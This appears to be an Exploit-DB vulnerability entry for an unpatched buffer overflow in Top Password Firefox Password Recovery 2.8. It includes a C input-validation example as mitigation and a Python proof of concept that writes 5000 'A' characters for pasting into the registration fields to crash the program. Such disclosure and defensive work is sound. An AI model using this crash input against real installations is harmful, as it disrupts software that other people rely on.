Vendor: Firefox Password Recovery
By: Antonio de la Piedra
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 119
Product Name: Firefox Password Recovery
Affected Version From: 2.8
Affected Version To: 2.8
Patch Exists: NO
Related CWE: N/A
CPE: a:top_password:firefox_password_recovery:2.8
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 SP1 32-bit
2020

Top Password Firefox Password Recovery 2.8 – Denial of Service (PoC)

When the contents of poc.txt are copied and pasted into the User Name / Registration Code input fields, the application crashes due to a buffer overflow.

Mitigation:

Input validation should be used to prevent buffer overflows.
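
The following is an added example of the length validation recommended above; it is not code from the vendor or from the original advisory. The product's source is not available, so the 64-byte field limits, the struct and every function name are assumptions. Oversized input such as the 5000-character poc.txt string is rejected before any copy into a fixed-size buffer.

```c
#include <stdio.h>
#include <string.h>

/* Assumed field limits; the real product's buffer sizes are not published. */
#define USER_MAX 64
#define CODE_MAX 64

struct registration { char user[USER_MAX]; char code[CODE_MAX]; };

/* Copy src into dst only if it fits, terminator included.
 * Oversized input is rejected, never truncated and never copied. */
static int copy_field(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    size_t n = strlen(src);
    if (n >= dst_size)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Validate both fields into a scratch copy, then commit them together,
 * so a rejected field never leaves the caller's state half-updated. */
int set_registration(struct registration *r, const char *user, const char *code)
{
    struct registration tmp = {0};
    if (r == NULL ||
        copy_field(tmp.user, sizeof tmp.user, user) != 0 ||
        copy_field(tmp.code, sizeof tmp.code, code) != 0)
        return -1;
    *r = tmp;
    return 0;
}

/* Constructed input matching the PoC: 5000 'A' characters in both fields. */
int poc_input_rejected(void)
{
    static char poc[5001];
    struct registration r;
    memset(poc, 'A', 5000);
    poc[5000] = '\0';
    return set_registration(&r, poc, poc) == -1;
}

int main(void)
{
    printf("5000-character input rejected: %d\n", poc_input_rejected());
    return 0;
}
```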

Exploit-DB raw data:

# Exploit Title: Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.top-password.com/
# Software Link: https://www.top-password.com/download/FirefoxPRSetup.exe
# Version: 2.8
# Tested on: Windows 7 SP1 32-bit

# Copy paste the contents of poc.txt  into the
# User Name / Registration Code input fields.

#!/usr/bin/python

# Build a 5000-character string of "A" and write it to poc.txt
poc = "A" * 5000
with open("poc.txt", "w") as f:
    f.write(poc)